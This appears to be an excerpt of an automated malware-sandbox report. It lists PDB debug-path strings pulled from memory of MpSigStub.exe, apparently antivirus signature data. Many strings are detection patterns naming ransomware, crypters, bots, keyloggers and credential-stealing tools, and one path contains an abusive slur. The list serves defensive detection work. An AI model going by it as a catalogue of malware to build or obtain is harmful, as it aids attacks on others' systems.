Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: .+:\\.+\\.*Pedro\\.*PH_Secret_Application.*\\PH_Secret_Application.*\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: !6zyA6@267=HPS.C|dMqd4-qaN|yjm.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp
Source: Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000023.00000003.18343980449.0000015B1ACD2000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \ransom.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp
Source: Binary string: out\Release\360EntClient.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp
Source: Binary string: \Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp
Source: Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \FARATCLIENT\obj\Debug\FARATCLIENT.pdb source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp
Source: Binary string: JOe|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp
Source: Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 00000023.00000003.18320569449.0000015B1B556000.00000004.00000001.sdmp
Source: Binary string: \starter.pdb source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp
Source: Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp
Source: Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: sdmf|er.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb] source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: Pb730.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: 0rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 00000023.00000003.18300879046.0000015B1A6C2000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: +kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: \P2P\Client\Debug\Client.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: PicoTorrent.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: SKRFM.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: arc\Release\arc.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: DownExecute.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp
Source: Binary string: \defeat\rtl49.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000023.00000003.18336377296.0000015B1BE9E000.00000004.00000001.sdmp
Source: Binary string: \i386\Driver.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \Minoral.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000023.00000003.18338076360.0000015B1B388000.00000004.00000001.sdmp
Source: Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: msiexec.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: upE:\\WORK\\WORK_PECEPB\\Work_2012 Private\\.*\\Silence_lock_bot\\Silence_lock_bot\\Release\\Silence_lock_bot.pdb source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
